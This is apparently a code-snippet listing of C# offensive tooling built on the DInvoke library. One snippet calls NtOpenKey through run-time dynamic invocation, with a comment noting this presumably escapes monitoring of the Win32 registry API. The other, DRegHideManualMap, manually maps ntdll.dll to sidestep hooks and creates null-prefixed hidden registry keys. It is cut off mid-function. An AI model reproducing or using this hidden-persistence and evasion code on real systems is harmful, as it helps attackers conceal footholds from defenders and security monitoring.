Пример #1
 /// <summary>
 /// Invokes the <c>NtOpenKey</c> export of ntdll.dll through DInvoke's
 /// <c>DynamicAPIInvoke</c> helper and returns the status it produced.
 /// </summary>
 /// <param name="keyHandle">
 /// Passed in as argument slot 0; overwritten with whatever that slot holds after the call.
 /// </param>
 /// <param name="desiredAccess">Access mask forwarded unchanged as argument slot 1.</param>
 /// <param name="objectAttributes">
 /// Forwarded as argument slot 2. Nothing is copied back into it after the call.
 /// </param>
 /// <returns>The value returned by the dynamic invocation, cast to NTSTATUS.</returns>
 /// <remarks>
 /// NOTE(review): the export is named by string and resolved at run time, so this method
 /// carries no DllImport declaration for NtOpenKey. Monitoring that keys on the Win32
 /// registry API layer will presumably not observe this call; kernel-side registry
 /// telemetry is the more dependable source. Confirm against the deployed sensors.
 /// </remarks>
 public static DInvoke.Data.Native.NTSTATUS NtOpenKey(
     ref IntPtr keyHandle,
     STRUCTS.ACCESS_MASK desiredAccess,
     ref STRUCTS.OBJECT_ATTRIBUTES objectAttributes)
 {
     // Arguments are boxed into an object array because the helper takes them by position.
     object[] nativeArgs = new object[] { keyHandle, desiredAccess, objectAttributes };

     var status = (DInvoke.Data.Native.NTSTATUS)DInvoke.DynamicInvoke.Generic.DynamicAPIInvoke(
         @"ntdll.dll",
         @"NtOpenKey",
         typeof(DELEGATES.NtOpenKey),
         ref nativeArgs);

     // Only the handle slot is read back; the boxed struct in slot 2 is discarded.
     keyHandle = (IntPtr)nativeArgs[0];

     return status;
 }
Пример #2
        public static void DRegHideManualMap(String hive = "HKCU", String subKey = @"\SOFTWARE", String keyName = "", String keyValue = "", bool hiddenKey = false, bool deleteKey = false)
        {
            DInvoke.Data.PE.PE_MANUAL_MAP mappedDLL = new DInvoke.Data.PE.PE_MANUAL_MAP();
            mappedDLL = DInvoke.ManualMap.Map.MapModuleToMemory(@"C:\Windows\System32\ntdll.dll");

            try
            {
                if (hive == "HKLM")
                {
                    hive = @"\Registry\Machine";
                }
                else if (hive == "HKCU")
                {
                    String sid = WindowsIdentity.GetCurrent().User.ToString();
                    hive = @"\Registry\User\" + sid;
                }
                else
                {
                    throw new Exception("Hive needs to be either HKLM or HKCU");
                }
                if (hiddenKey)
                {
                    keyName = "\0" + keyName;
                }
                String regKey    = hive + subKey;
                IntPtr keyHandle = IntPtr.Zero;
                STRUCTS.OBJECT_ATTRIBUTES          oa        = new STRUCTS.OBJECT_ATTRIBUTES();
                DInvoke.Data.Native.UNICODE_STRING UC_RegKey = new DInvoke.Data.Native.UNICODE_STRING();
                string SID = WindowsIdentity.GetCurrent().User.ToString();
                DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref UC_RegKey, regKey);
                IntPtr oaObjectName = Marshal.AllocHGlobal(Marshal.SizeOf(UC_RegKey));
                Marshal.StructureToPtr(UC_RegKey, oaObjectName, true);
                oa.Length                   = Marshal.SizeOf(oa);
                oa.Attributes               = (uint)STRUCTS.OBJ_ATTRIBUTES.CASE_INSENSITIVE;
                oa.objectName               = oaObjectName;
                oa.SecurityDescriptor       = IntPtr.Zero;
                oa.SecurityQualityOfService = IntPtr.Zero;
                DInvoke.Data.Native.NTSTATUS retValue = new DInvoke.Data.Native.NTSTATUS();

                ref IntPtr                    rkeyHandle    = ref keyHandle;
                STRUCTS.ACCESS_MASK           desiredAccess = STRUCTS.ACCESS_MASK.KEY_ALL_ACCESS;
                ref STRUCTS.OBJECT_ATTRIBUTES roa           = ref oa;